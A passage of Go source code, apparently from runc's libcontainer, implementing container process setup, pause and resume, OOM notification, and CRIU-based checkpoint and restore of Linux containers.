cmd.SysProcAttr.Pdeathsig = unix.Signal(c.config.ParentDeathSignal)
}
return cmd
}
func (c *linuxContainer) newInitProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*initProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initStandard))
nsMaps := make(map[configs.NamespaceType]string)
for _, ns := range c.config.Namespaces {
if ns.Path != "" {
nsMaps[ns.Type] = ns.Path
}
}
_, sharePidns := nsMaps[configs.NEWPID]
data, err := c.bootstrapData(c.config.Namespaces.CloneFlags(), nsMaps)
if err != nil {
return nil, err
}
init := &initProcess{
cmd: cmd,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
manager: c.cgroupManager,
intelRdtManager: c.intelRdtManager,
config: c.newInitConfig(p),
container: c,
process: p,
bootstrapData: data,
sharePidns: sharePidns,
}
c.initProcess = init
return init, nil
}
func (c *linuxContainer) newSetnsProcess(p *Process, cmd *exec.Cmd, messageSockPair, logFilePair filePair) (*setnsProcess, error) {
cmd.Env = append(cmd.Env, "_LIBCONTAINER_INITTYPE="+string(initSetns))
state, err := c.currentState()
if err != nil {
return nil, newSystemErrorWithCause(err, "getting container's current state")
}
// for setns process, we don't have to set cloneflags as the process namespaces
// will only be set via setns syscall
data, err := c.bootstrapData(0, state.NamespacePaths)
if err != nil {
return nil, err
}
return &setnsProcess{
cmd: cmd,
cgroupPaths: state.CgroupPaths,
rootlessCgroups: c.config.RootlessCgroups,
intelRdtPath: state.IntelRdtPath,
messageSockPair: messageSockPair,
logFilePair: logFilePair,
config: c.newInitConfig(p),
process: p,
bootstrapData: data,
initProcessPid: state.InitProcessPid,
}, nil
}
func (c *linuxContainer) newInitConfig(process *Process) *initConfig {
cfg := &initConfig{
Config: c.config,
Args: process.Args,
Env: process.Env,
User: process.User,
AdditionalGroups: process.AdditionalGroups,
Cwd: process.Cwd,
Capabilities: process.Capabilities,
PassedFilesCount: len(process.ExtraFiles),
ContainerId: c.ID(),
NoNewPrivileges: c.config.NoNewPrivileges,
RootlessEUID: c.config.RootlessEUID,
RootlessCgroups: c.config.RootlessCgroups,
AppArmorProfile: c.config.AppArmorProfile,
ProcessLabel: c.config.ProcessLabel,
Rlimits: c.config.Rlimits,
}
if process.NoNewPrivileges != nil {
cfg.NoNewPrivileges = *process.NoNewPrivileges
}
if process.AppArmorProfile != "" {
cfg.AppArmorProfile = process.AppArmorProfile
}
if process.Label != "" {
cfg.ProcessLabel = process.Label
}
if len(process.Rlimits) > 0 {
cfg.Rlimits = process.Rlimits
}
cfg.CreateConsole = process.ConsoleSocket != nil
cfg.ConsoleWidth = process.ConsoleWidth
cfg.ConsoleHeight = process.ConsoleHeight
return cfg
}
func (c *linuxContainer) Destroy() error {
c.m.Lock()
defer c.m.Unlock()
return c.state.destroy()
}
func (c *linuxContainer) Pause() error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
switch status {
case Running, Created:
if err := c.cgroupManager.Freeze(configs.Frozen); err != nil {
return err
}
return c.state.transition(&pausedState{
c: c,
})
}
return newGenericError(fmt.Errorf("container not running or created: %s", status), ContainerNotRunning)
}
func (c *linuxContainer) Resume() error {
c.m.Lock()
defer c.m.Unlock()
status, err := c.currentStatus()
if err != nil {
return err
}
if status != Paused {
return newGenericError(fmt.Errorf("container not paused"), ContainerNotPaused)
}
if err := c.cgroupManager.Freeze(configs.Thawed); err != nil {
return err
}
return c.state.transition(&runningState{
c: c,
})
}
func (c *linuxContainer) NotifyOOM() (<-chan struct{}, error) {
// XXX(cyphar): This requires cgroups.
if c.config.RootlessCgroups {
logrus.Warn("getting OOM notifications may fail if you don't have the full access to cgroups")
}
path := c.cgroupManager.Path("memory")
if cgroups.IsCgroup2UnifiedMode() {
return notifyOnOOMV2(path)
}
return notifyOnOOM(path)
}
func (c *linuxContainer) NotifyMemoryPressure(level PressureLevel) (<-chan struct{}, error) {
// XXX(cyphar): This requires cgroups.
if c.config.RootlessCgroups {
logrus.Warn("getting memory pressure notifications may fail if you don't have the full access to cgroups")
}
return notifyMemoryPressure(c.cgroupManager.Path("memory"), level)
}
var criuFeatures *criurpc.CriuFeatures
func (c *linuxContainer) checkCriuFeatures(criuOpts *CriuOpts, rpcOpts *criurpc.CriuOpts, criuFeat *criurpc.CriuFeatures) error {
var t criurpc.CriuReqType
t = criurpc.CriuReqType_FEATURE_CHECK
// make sure the features we are looking for are really not from
// some previous check
criuFeatures = nil
req := &criurpc.CriuReq{
Type: &t,
// Theoretically this should not be necessary but CRIU
// segfaults if Opts is empty.
// Fixed in CRIU 2.12
Opts: rpcOpts,
Features: criuFeat,
}
err := c.criuSwrk(nil, req, criuOpts, false, nil)
if err != nil {
logrus.Debugf("%s", err)
return errors.New("CRIU feature check failed")
}
logrus.Debugf("Feature check says: %s", criuFeatures)
missingFeatures := false
// The outer if checks if the fields actually exist
if (criuFeat.MemTrack != nil) &&
(criuFeatures.MemTrack != nil) {
// The inner if checks if they are set to true
if *criuFeat.MemTrack && !*criuFeatures.MemTrack {
missingFeatures = true
logrus.Debugf("CRIU does not support MemTrack")
}
}
// This needs to be repeated for every new feature check.
	// Is there a way to put this in a function? Reflection?
if (criuFeat.LazyPages != nil) &&
(criuFeatures.LazyPages != nil) {
if *criuFeat.LazyPages && !*criuFeatures.LazyPages {
missingFeatures = true
logrus.Debugf("CRIU does not support LazyPages")
}
}
if missingFeatures {
return errors.New("CRIU is missing features")
}
return nil
}
func compareCriuVersion(criuVersion int, minVersion int) error {
// simple function to perform the actual version compare
if criuVersion < minVersion {
return fmt.Errorf("CRIU version %d must be %d or higher", criuVersion, minVersion)
}
return nil
}
// checkCriuVersion checks Criu version greater than or equal to minVersion
func (c *linuxContainer) checkCriuVersion(minVersion int) error {
// If the version of criu has already been determined there is no need
// to ask criu for the version again. Use the value from c.criuVersion.
if c.criuVersion != 0 {
return compareCriuVersion(c.criuVersion, minVersion)
}
criu := criu.MakeCriu()
var err error
c.criuVersion, err = criu.GetCriuVersion()
if err != nil {
return fmt.Errorf("CRIU version check failed: %s", err)
}
return compareCriuVersion(c.criuVersion, minVersion)
}
const descriptorsFilename = "descriptors.json"
func (c *linuxContainer) addCriuDumpMount(req *criurpc.CriuReq, m *configs.Mount) {
mountDest := m.Destination
if strings.HasPrefix(mountDest, c.config.Rootfs) {
mountDest = mountDest[len(c.config.Rootfs):]
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(mountDest),
Val: proto.String(mountDest),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
func (c *linuxContainer) addMaskPaths(req *criurpc.CriuReq) error {
for _, path := range c.config.MaskPaths {
fi, err := os.Stat(fmt.Sprintf("/proc/%d/root/%s", c.initProcess.pid(), path))
if err != nil {
if os.IsNotExist(err) {
continue
}
return err
}
if fi.IsDir() {
continue
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(path),
Val: proto.String("/dev/null"),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
return nil
}
func (c *linuxContainer) handleCriuConfigurationFile(rpcOpts *criurpc.CriuOpts) {
// CRIU will evaluate a configuration starting with release 3.11.
// Settings in the configuration file will overwrite RPC settings.
// Look for annotations. The annotation 'org.criu.config'
// specifies if CRIU should use a different, container specific
// configuration file.
_, annotations := utils.Annotations(c.config.Labels)
configFile, exists := annotations["org.criu.config"]
if exists {
// If the annotation 'org.criu.config' exists and is set
// to a non-empty string, tell CRIU to use that as a
// configuration file. If the file does not exist, CRIU
// will just ignore it.
if configFile != "" {
rpcOpts.ConfigFile = proto.String(configFile)
}
// If 'org.criu.config' exists and is set to an empty
// string, a runc specific CRIU configuration file will
// be not set at all.
} else {
// If the mentioned annotation has not been found, specify
// a default CRIU configuration file.
rpcOpts.ConfigFile = proto.String("/etc/criu/runc.conf")
}
}
func (c *linuxContainer) Checkpoint(criuOpts *CriuOpts) error {
c.m.Lock()
defer c.m.Unlock()
// Checkpoint is unlikely to work if os.Geteuid() != 0 || system.RunningInUserNS().
// (CLI prints a warning)
// TODO(avagin): Figure out how to make this work nicely. CRIU 2.0 has
// support for doing unprivileged dumps, but the setup of
// rootless containers might make this complicated.
// We are relying on the CRIU version RPC which was introduced with CRIU 3.0.0
if err := c.checkCriuVersion(30000); err != nil {
return err
}
if criuOpts.ImagesDirectory == "" {
return errors.New("invalid directory to save checkpoint")
}
// Since a container can be C/R'ed multiple times,
// the checkpoint directory may already exist.
if err := os.Mkdir(criuOpts.ImagesDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
if criuOpts.WorkDirectory == "" {
criuOpts.WorkDirectory = filepath.Join(c.root, "criu.work")
}
if err := os.Mkdir(criuOpts.WorkDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
workDir, err := os.Open(criuOpts.WorkDirectory)
if err != nil {
return err
}
defer workDir.Close()
imageDir, err := os.Open(criuOpts.ImagesDirectory)
if err != nil {
return err
}
defer imageDir.Close()
rpcOpts := criurpc.CriuOpts{
ImagesDirFd: proto.Int32(int32(imageDir.Fd())),
WorkDirFd: proto.Int32(int32(workDir.Fd())),
LogLevel: proto.Int32(4),
LogFile: proto.String("dump.log"),
Root: proto.String(c.config.Rootfs),
ManageCgroups: proto.Bool(true),
NotifyScripts: proto.Bool(true),
Pid: proto.Int32(int32(c.initProcess.pid())),
ShellJob: proto.Bool(criuOpts.ShellJob),
LeaveRunning: proto.Bool(criuOpts.LeaveRunning),
TcpEstablished: proto.Bool(criuOpts.TcpEstablished),
ExtUnixSk: proto.Bool(criuOpts.ExternalUnixConnections),
FileLocks: proto.Bool(criuOpts.FileLocks),
EmptyNs: proto.Uint32(criuOpts.EmptyNs),
OrphanPtsMaster: proto.Bool(true),
AutoDedup: proto.Bool(criuOpts.AutoDedup),
LazyPages: proto.Bool(criuOpts.LazyPages),
}
c.handleCriuConfigurationFile(&rpcOpts)
// If the container is running in a network namespace and has
// a path to the network namespace configured, we will dump
// that network namespace as an external namespace and we
// will expect that the namespace exists during restore.
// This basically means that CRIU will ignore the namespace
// and expect to be setup correctly.
nsPath := c.config.Namespaces.PathOf(configs.NEWNET)
if nsPath != "" {
// For this to work we need at least criu 3.11.0 => 31100.
// As there was already a successful version check we will
// not error out if it fails. runc will just behave as it used
// to do and ignore external network namespaces.
err := c.checkCriuVersion(31100)
if err == nil {
// CRIU expects the information about an external namespace
// like this: --external net[<inode>]:<key>
// This <key> is always 'extRootNetNS'.
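			// e.g. (illustrative inode value only): --external net[4026531993]:extRootNetNS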
var netns unix.Stat_t
err = unix.Stat(nsPath, &netns)
if err != nil {
return err
}
criuExternal := fmt.Sprintf("net[%d]:extRootNetNS", netns.Ino)
rpcOpts.External = append(rpcOpts.External, criuExternal)
}
}
// CRIU can use cgroup freezer; when rpcOpts.FreezeCgroup
// is not set, CRIU uses ptrace() to pause the processes.
// Note cgroup v2 freezer is only supported since CRIU release 3.14.
if !cgroups.IsCgroup2UnifiedMode() || c.checkCriuVersion(31400) == nil {
if fcg := c.cgroupManager.Path("freezer"); fcg != "" {
rpcOpts.FreezeCgroup = proto.String(fcg)
}
}
// append optional criu opts, e.g., page-server and port
if criuOpts.PageServer.Address != "" && criuOpts.PageServer.Port != 0 {
rpcOpts.Ps = &criurpc.CriuPageServerInfo{
Address: proto.String(criuOpts.PageServer.Address),
Port: proto.Int32(criuOpts.PageServer.Port),
}
}
	// pre-dump may need the parentImage param to complete iterative migration
if criuOpts.ParentImage != "" {
rpcOpts.ParentImg = proto.String(criuOpts.ParentImage)
rpcOpts.TrackMem = proto.Bool(true)
}
// append optional manage cgroups mode
if criuOpts.ManageCgroupsMode != 0 {
mode := criurpc.CriuCgMode(criuOpts.ManageCgroupsMode)
rpcOpts.ManageCgroupsMode = &mode
}
var t criurpc.CriuReqType
if criuOpts.PreDump {
feat := criurpc.CriuFeatures{
MemTrack: proto.Bool(true),
}
if err := c.checkCriuFeatures(criuOpts, &rpcOpts, &feat); err != nil {
return err
}
t = criurpc.CriuReqType_PRE_DUMP
} else {
t = criurpc.CriuReqType_DUMP
}
if criuOpts.LazyPages {
// lazy migration requested; check if criu supports it
feat := criurpc.CriuFeatures{
LazyPages: proto.Bool(true),
}
if err := c.checkCriuFeatures(criuOpts, &rpcOpts, &feat); err != nil {
return err
}
if fd := criuOpts.StatusFd; fd != -1 {
// check that the FD is valid
flags, err := unix.FcntlInt(uintptr(fd), unix.F_GETFL, 0)
if err != nil {
return fmt.Errorf("invalid --status-fd argument %d: %w", fd, err)
}
// and writable
if flags&unix.O_WRONLY == 0 {
return fmt.Errorf("invalid --status-fd argument %d: not writable", fd)
}
rpcOpts.StatusFd = proto.Int32(int32(fd))
}
}
req := &criurpc.CriuReq{
Type: &t,
Opts: &rpcOpts,
}
// no need to dump all this in pre-dump
if !criuOpts.PreDump {
hasCgroupns := c.config.Namespaces.Contains(configs.NEWCGROUP)
for _, m := range c.config.Mounts {
switch m.Device {
case "bind":
c.addCriuDumpMount(req, m)
case "cgroup":
if cgroups.IsCgroup2UnifiedMode() || hasCgroupns {
// real mount(s)
continue
}
// a set of "external" bind mounts
binds, err := getCgroupMounts(m)
if err != nil {
return err
}
for _, b := range binds {
c.addCriuDumpMount(req, b)
}
}
}
if err := c.addMaskPaths(req); err != nil {
return err
}
for _, node := range c.config.Devices {
m := &configs.Mount{Destination: node.Path, Source: node.Path}
c.addCriuDumpMount(req, m)
}
// Write the FD info to a file in the image directory
fdsJSON, err := json.Marshal(c.initProcess.externalDescriptors())
if err != nil {
return err
}
err = ioutil.WriteFile(filepath.Join(criuOpts.ImagesDirectory, descriptorsFilename), fdsJSON, 0600)
if err != nil {
return err
}
}
err = c.criuSwrk(nil, req, criuOpts, false, nil)
if err != nil {
return err
}
return nil
}
func (c *linuxContainer) addCriuRestoreMount(req *criurpc.CriuReq, m *configs.Mount) {
mountDest := m.Destination
if strings.HasPrefix(mountDest, c.config.Rootfs) {
mountDest = mountDest[len(c.config.Rootfs):]
}
extMnt := &criurpc.ExtMountMap{
Key: proto.String(mountDest),
Val: proto.String(m.Source),
}
req.Opts.ExtMnt = append(req.Opts.ExtMnt, extMnt)
}
func (c *linuxContainer) restoreNetwork(req *criurpc.CriuReq, criuOpts *CriuOpts) {
for _, iface := range c.config.Networks {
switch iface.Type {
case "veth":
veth := new(criurpc.CriuVethPair)
veth.IfOut = proto.String(iface.HostInterfaceName)
veth.IfIn = proto.String(iface.Name)
req.Opts.Veths = append(req.Opts.Veths, veth)
case "loopback":
// Do nothing
}
}
for _, i := range criuOpts.VethPairs {
veth := new(criurpc.CriuVethPair)
veth.IfOut = proto.String(i.HostInterfaceName)
veth.IfIn = proto.String(i.ContainerInterfaceName)
req.Opts.Veths = append(req.Opts.Veths, veth)
}
}
// makeCriuRestoreMountpoints makes the actual mountpoints for the
// restore using CRIU. This function is inspired by the code in
// rootfs_linux.go
func (c *linuxContainer) makeCriuRestoreMountpoints(m *configs.Mount) error {
switch m.Device {
case "cgroup":
// No mount point(s) need to be created:
//
// * for v1, mount points are saved by CRIU because
// /sys/fs/cgroup is a tmpfs mount
//
// * for v2, /sys/fs/cgroup is a real mount, but
// the mountpoint appears as soon as /sys is mounted
return nil
case "bind":
// The prepareBindMount() function checks if source
// exists. So it cannot be used for other filesystem types.
if err := prepareBindMount(m, c.config.Rootfs); err != nil {
return err
}
default:
// for all other filesystems just create the mountpoints
dest, err := securejoin.SecureJoin(c.config.Rootfs, m.Destination)
if err != nil {
return err
}
if err := checkProcMount(c.config.Rootfs, dest, ""); err != nil {
return err
}
m.Destination = dest
if err := os.MkdirAll(dest, 0755); err != nil {
return err
}
}
return nil
}
// isPathInPrefixList is a small function for CRIU restore to make sure
// mountpoints, which are on a tmpfs, are not created in the rootfs
func isPathInPrefixList(path string, prefix []string) bool {
for _, p := range prefix {
if strings.HasPrefix(path, p+"/") {
return true
}
}
return false
}
// prepareCriuRestoreMounts tries to set up the rootfs of the
// container to be restored in the same way runc does it for
// initial container creation. Even for a read-only rootfs container
// runc modifies the rootfs to add mountpoints which do not exist.
// This function also creates missing mountpoints as long as they
// are not on top of a tmpfs, as CRIU will restore tmpfs content anyway.
func (c *linuxContainer) prepareCriuRestoreMounts(mounts []*configs.Mount) error {
// First get a list of a all tmpfs mounts
tmpfs := []string{}
for _, m := range mounts {
switch m.Device {
case "tmpfs":
tmpfs = append(tmpfs, m.Destination)
}
}
// Now go through all mounts and create the mountpoints
// if the mountpoints are not on a tmpfs, as CRIU will
// restore the complete tmpfs content from its checkpoint.
for _, m := range mounts {
if !isPathInPrefixList(m.Destination, tmpfs) {
if err := c.makeCriuRestoreMountpoints(m); err != nil {
return err
}
}
}
return nil
}
func (c *linuxContainer) Restore(process *Process, criuOpts *CriuOpts) error {
c.m.Lock()
defer c.m.Unlock()
var extraFiles []*os.File
// Restore is unlikely to work if os.Geteuid() != 0 || system.RunningInUserNS().
// (CLI prints a warning)
// TODO(avagin): Figure out how to make this work nicely. CRIU doesn't have
// support for unprivileged restore at the moment.
// We are relying on the CRIU version RPC which was introduced with CRIU 3.0.0
if err := c.checkCriuVersion(30000); err != nil {
return err
}
if criuOpts.WorkDirectory == "" {
criuOpts.WorkDirectory = filepath.Join(c.root, "criu.work")
}
// Since a container can be C/R'ed multiple times,
// the work directory may already exist.
if err := os.Mkdir(criuOpts.WorkDirectory, 0700); err != nil && !os.IsExist(err) {
return err
}
workDir, err := os.Open(criuOpts.WorkDirectory)
if err != nil {
return err
}
defer workDir.Close()
if criuOpts.ImagesDirectory == "" {
return errors.New("invalid directory to restore checkpoint")
}
imageDir, err := os.Open(criuOpts.ImagesDirectory)
if err != nil {
return err
}
defer imageDir.Close()
// CRIU has a few requirements for a root directory:
// * it must be a mount point
// * its parent must not be overmounted
// c.config.Rootfs is bind-mounted to a temporary directory
// to satisfy these requirements.
root := filepath.Join(c.root, "criu-root")
if err := os.Mkdir(root, 0755); err != nil {
return err
}
defer os.Remove(root)
root, err = filepath.EvalSymlinks(root)
if err != nil {
return err
}
err = unix.Mount(c.config.Rootfs, root, "", unix.MS_BIND|unix.MS_REC, "")
if err != nil {
return err
}
defer unix.Unmount(root, unix.MNT_DETACH)
t := criurpc.CriuReqType_RESTORE
req := &criurpc.CriuReq{
Type: &t,
Opts: &criurpc.CriuOpts{
ImagesDirFd: proto.Int32(int32(imageDir.Fd())),
WorkDirFd: proto.Int32(int32(workDir.Fd())),
EvasiveDevices: proto.Bool(true),
LogLevel: proto.Int32(4),
LogFile: proto.String("restore.log"),
RstSibling: proto.Bool(true),
Root: proto.String(root),
ManageCgroups: proto.Bool(true),
NotifyScripts: proto.Bool(true),
ShellJob: proto.Bool(criuOpts.ShellJob),
ExtUnixSk: proto.Bool(criuOpts.ExternalUnixConnections),
TcpEstablished: proto.Bool(criuOpts.TcpEstablished),
FileLocks: proto.Bool(criuOpts.FileLocks),
EmptyNs: proto.Uint32(criuOpts.EmptyNs),
OrphanPtsMaster: proto.Bool(true),
AutoDedup: proto.Bool(criuOpts.AutoDedup),
LazyPages: proto.Bool(criuOpts.LazyPages),
},
}
c.handleCriuConfigurationFile(req.Opts)
// Same as during checkpointing. If the container has a specific network namespace
// assigned to it, this now expects that the checkpoint will be restored in a
// already created network namespace.
nsPath := c.config.Namespaces.PathOf(configs.NEWNET)
if nsPath != "" {
// For this to work we need at least criu 3.11.0 => 31100.
// As there was already a successful version check we will
// not error out if it fails. runc will just behave as it used
// to do and ignore external network namespaces.
err := c.checkCriuVersion(31100)
if err == nil {
// CRIU wants the information about an existing network namespace
// like this: --inherit-fd fd[<fd>]:<key>
// The <key> needs to be the same as during checkpointing.
// We are always using 'extRootNetNS' as the key in this.
netns, err := os.Open(nsPath)
if err != nil {
logrus.Errorf("If a specific network namespace is defined it must exist: %s", err)
return fmt.Errorf("Requested network namespace %v does not exist", nsPath)
}
defer netns.Close()
inheritFd := new(criurpc.InheritFd)
inheritFd.Key = proto.String("extRootNetNS")
			// The offset of four is necessary because 0, 1, 2 and 3 are already
// used by stdin, stdout, stderr, 'criu swrk' socket.
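			// e.g. (illustrative): if no other extra files were queued yet, the
			// restored network namespace fd is announced to CRIU as fd 4.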
inheritFd.Fd = proto.Int32(int32(4 + len(extraFiles)))
req.Opts.InheritFd = append(req.Opts.InheritFd, inheritFd)
// All open FDs need to be transferred to CRIU via extraFiles
extraFiles = append(extraFiles, netns)
}
}
// This will modify the rootfs of the container in the same way runc
// modifies the container during initial creation.
if err := c.prepareCriuRestoreMounts(c.config.Mounts); err != nil {
return err
}
hasCgroupns := c.config.Namespaces.Contains(configs.NEWCGROUP)
for _, m := range c.config.Mounts {
switch m.Device {
case "bind":
c.addCriuRestoreMount(req, m)
case "cgroup":
if cgroups.IsCgroup2UnifiedMode() || hasCgroupns {
continue
}
// cgroup v1 is a set of bind mounts, unless cgroupns is used
binds, err := getCgroupMounts(m)
if err != nil {
return err
}
for _, b := range binds {
c.addCriuRestoreMount(req, b)
}
}
}
if len(c.config.MaskPaths) > 0 {
m := &configs.Mount{Destination: "/dev/null", Source: "/dev/null"}
c.addCriuRestoreMount(req, m)
}
for _, node := range c.config.Devices {
m := &configs.Mount{Destination: node.Path, Source: node.Path}
c.addCriuRestoreMount(req, m)
}
if criuOpts.EmptyNs&unix.CLONE_NEWNET == 0 {
c.restoreNetwork(req, criuOpts)
}
// append optional manage cgroups mode
if criuOpts.ManageCgroupsMode != 0 {
mode := criurpc.CriuCgMode(criuOpts.ManageCgroupsMode)
req.Opts.ManageCgroupsMode = &mode
}
var (
fds []string
fdJSON []byte
)
if fdJSON, err = ioutil.ReadFile(filepath.Join(criuOpts.ImagesDirectory, descriptorsFilename)); err != nil {
return err
}
if err := json.Unmarshal(fdJSON, &fds); err != nil {
return err
}
for i := range fds {
if s := fds[i]; strings.Contains(s, "pipe:") {
inheritFd := new(criurpc.InheritFd)
inheritFd.Key = proto.String(s)
inheritFd.Fd = proto.Int32(int32(i))
req.Opts.InheritFd = append(req.Opts.InheritFd, inheritFd)
}
}
return c.criuSwrk(process, req, criuOpts, true, extraFiles)
}
func (c *linuxContainer) criuApplyCgroups(pid int, req *criurpc.CriuReq) error {
// XXX: Do we need to deal with this case? AFAIK criu still requires root.
if err := c.cgroupManager.Apply(pid); err != nil {
return err
}
if err := c.cgroupManager.Set(c.config); err != nil {
return newSystemError(err)
}
path := fmt.Sprintf("/proc/%d/cgroup", pid)
cgroupsPaths, err := cgroups.ParseCgroupFile(path)
if err != nil {
return err
}
for c, p := range cgroupsPaths {
cgroupRoot := &criurpc.CgroupRoot{
Ctrl: proto.String(c),
Path: proto.String(p),
}
req.Opts.CgRoot = append(req.Opts.CgRoot, cgroupRoot)
}
return nil
}
func (c *linuxContainer) criuSwrk(process *Process, req *criurpc.CriuReq, opts *CriuOpts, applyCgroups bool, extraFiles []*os.File) error {
fds, err := unix.Socketpair(unix.AF_LOCAL, unix.SOCK_SEQPACKET|unix.SOCK_CLOEXEC, 0)
if err != nil {
return err
}
var logPath string
if opts != nil {
logPath = filepath.Join(opts.WorkDirectory, req.GetOpts().GetLogFile())
} else {
// For the VERSION RPC 'opts' is set to 'nil' and therefore
// opts.WorkDirectory does not exist. Set logPath to "".
logPath = ""
}
criuClient := os.NewFile(uintptr(fds[0]), "criu-transport-client")
criuClientFileCon, err := net.FileConn(criuClient)
criuClient.Close()
if err != nil {
return err
}
criuClientCon := criuClientFileCon.(*net.UnixConn)
defer criuClientCon.Close()
criuServer := os.NewFile(uintptr(fds[1]), "criu-transport-server")
defer criuServer.Close()
args := []string{"swrk", "3"}
if c.criuVersion != 0 {
// If the CRIU Version is still '0' then this is probably
// the initial CRIU run to detect the version. Skip it.
logrus.Debugf("Using CRIU %d at: %s", c.criuVersion, c.criuPath)
}
logrus.Debugf("Using CRIU with following args: %s", args)
cmd := exec.Command(c.criuPath, args...)
if process != nil {
cmd.Stdin = process.Stdin
cmd.Stdout = process.Stdout
cmd.Stderr = process.Stderr
}
cmd.ExtraFiles = append(cmd.ExtraFiles, criuServer)
if extraFiles != nil {
cmd.ExtraFiles = append(cmd.ExtraFiles, extraFiles...)
}
if err := cmd.Start(); err != nil {
return err
}
// we close criuServer so that even if CRIU crashes or unexpectedly exits, runc will not hang.
criuServer.Close()
// cmd.Process will be replaced by a restored init.
criuProcess := cmd.Process
var criuProcessState *os.ProcessState
defer func() {
if criuProcessState == nil {
criuClientCon.Close()
_, err := criuProcess.Wait()
if err != nil {
logrus.Warnf("wait on criuProcess returned %v", err)
}
}
}()
if applyCgroups {
err := c.criuApplyCgroups(criuProcess.Pid, req)
if err != nil {
return err
}
}
var extFds []string
if process != nil {
extFds, err = getPipeFds(criuProcess.Pid)
if err != nil {
return err
}
}
logrus.Debugf("Using CRIU in %s mode", req.GetType().String())
// In the case of criurpc.CriuReqType_FEATURE_CHECK req.GetOpts()
// should be empty. For older CRIU versions it still will be
// available but empty. criurpc.CriuReqType_VERSION actually
// has no req.GetOpts().
if !(req.GetType() == criurpc.CriuReqType_FEATURE_CHECK ||
req.GetType() == criurpc.CriuReqType_VERSION) {
val := reflect.ValueOf(req.GetOpts())
v := reflect.Indirect(val)
for i := 0; i < v.NumField(); i++ {
st := v.Type()
name := st.Field(i).Name
if strings.HasPrefix(name, "XXX_") {
continue
}
value := val.MethodByName("Get" + name).Call([]reflect.Value{})
logrus.Debugf("CRIU option %s with value %v", name, value[0])
}
}
data, err := proto.Marshal(req)
if err != nil {
return err
}
_, err = criuClientCon.Write(data)
if err != nil {
return err
}
buf := make([]byte, 10*4096)
oob := make([]byte, 4096)
for {
n, oobn, _, _, err := criuClientCon.ReadMsgUnix(buf, oob)
if req.Opts != nil && req.Opts.StatusFd != nil {
// Close status_fd as soon as we got something back from criu,
// assuming it has consumed (reopened) it by this time.
// Otherwise it might be left open forever and whoever
// is waiting on it will wait forever.
fd := int(*req.Opts.StatusFd)
_ = unix.Close(fd)
req.Opts.StatusFd = nil
}
if err != nil {
return err
}
if n == 0 {
return errors.New("unexpected EOF")
}
if n == len(buf) {
return errors.New("buffer is too small")
}
resp := new(criurpc.CriuResp)
err = proto.Unmarshal(buf[:n], resp)
if err != nil {
return err
}
if !resp.GetSuccess() {
typeString := req.GetType().String()
return fmt.Errorf("criu failed: type %s errno %d\nlog file: %s", typeString, resp.GetCrErrno(), logPath)
}
t := resp.GetType()
switch {
case t == criurpc.CriuReqType_FEATURE_CHECK:
logrus.Debugf("Feature check says: %s", resp)
criuFeatures = resp.GetFeatures()
case t == criurpc.CriuReqType_NOTIFY:
if err := c.criuNotifications(resp, process, cmd, opts, extFds, oob[:oobn]); err != nil {
return err
}
t = criurpc.CriuReqType_NOTIFY
req = &criurpc.CriuReq{
Type: &t,
NotifySuccess: proto.Bool(true),
}
data, err = proto.Marshal(req)
if err != nil {
return err
}
_, err = criuClientCon.Write(data)
if err != nil {
return err
}
continue
case t == criurpc.CriuReqType_RESTORE:
case t == criurpc.CriuReqType_DUMP:
case t == criurpc.CriuReqType_PRE_DUMP:
default:
return fmt.Errorf("unable to parse the response %s", resp.String())
}
break
}
criuClientCon.CloseWrite()
// cmd.Wait() waits for cmd's goroutines, which are used for proxying file descriptors.
// Here we want to wait only for the CRIU process.
criuProcessState, err = criuProcess.Wait()
if err != nil {
return err
}
// In pre-dump mode CRIU is in a loop and waits for
// the final DUMP command.
// The current runc pre-dump approach, however, is
// to start criu in PRE_DUMP once for a single pre-dump
// and not the whole series of pre-dump, pre-dump, ..., dump.
// If we got the message CriuReqType_PRE_DUMP it means
// CRIU was successful and we need to forcefully stop CRIU
if !criuProcessState.Success() && *req.Type != criurpc.CriuReqType_PRE_DUMP {
return fmt.Errorf("criu failed: %s\nlog file: %s", criuProcessState.String(), logPath)
}
return nil
}
// block any external network activity
func lockNetwork(config *configs.Config) error {
for _, config := range config.Networks {
strategy, err := getStrategy(config.Type)
if err != nil {
return err
}
if err := strategy.detach(config); err != nil {
return err
}
}
return nil
}
func unlockNetwork(config *configs.Config) error {
for _, config := range config.Networks {
strategy, err := getStrategy(config.Type)
if err != nil {
return err
}
if err = strategy.attach(config); err != nil {
return err
}
}
return nil
}
func (c *linuxContainer) criuNotifications(resp *criurpc.CriuResp, process *Process, cmd *exec.Cmd, opts *CriuOpts, fds []string, oob []byte) error {
notify := resp.GetNotify()
if notify == nil {
return fmt.Errorf("invalid response: %s", resp.String())
}
logrus.Debugf("notify: %s\n", notify.GetScript())
switch {
case notify.GetScript() == "post-dump":
f, err := os.Create(filepath.Join(c.root, "checkpoint"))
if err != nil {
return err
}
f.Close()
case notify.GetScript() == "network-unlock":
if err := unlockNetwork(c.config); err != nil {
return err
}
case notify.GetScript() == "network-lock":
if err := lockNetwork(c.config); err != nil {
return err
}
case notify.GetScript() == "setup-namespaces":
if c.config.Hooks != nil {
s, err := c.currentOCIState()
if err != nil {
return nil
}
s.Pid = int(notify.GetPid())
for i, hook := range c.config.Hooks.Prestart {
if err := hook.Run(s); err != nil {
return newSystemErrorWithCausef(err, "running prestart hook %d", i)
}
}
}
case notify.GetScript() == "post-restore":
pid := notify.GetPid()
p, err := os.FindProcess(int(pid))
if err != nil {
return err
}
cmd.Process = p
r, err := newRestoredProcess(cmd, fds)
if err != nil {
return err
}
process.ops = r
if err := c.state.transition(&restoredState{
imageDir: opts.ImagesDirectory,
c: c,
}); err != nil {
return err
}
// create a timestamp indicating when the restored checkpoint was started
c.created = time.Now().UTC()
if _, err := c.updateState(r); err != nil {
return err
}
if err := os.Remove(filepath.Join(c.root, "checkpoint")); err != nil {
if !os.IsNotExist(err) {
logrus.Error(err)
}
}
case notify.GetScript() == "orphan-pts-master":
scm, err := unix.ParseSocketControlMessage(oob)
if err != nil {
return err
}
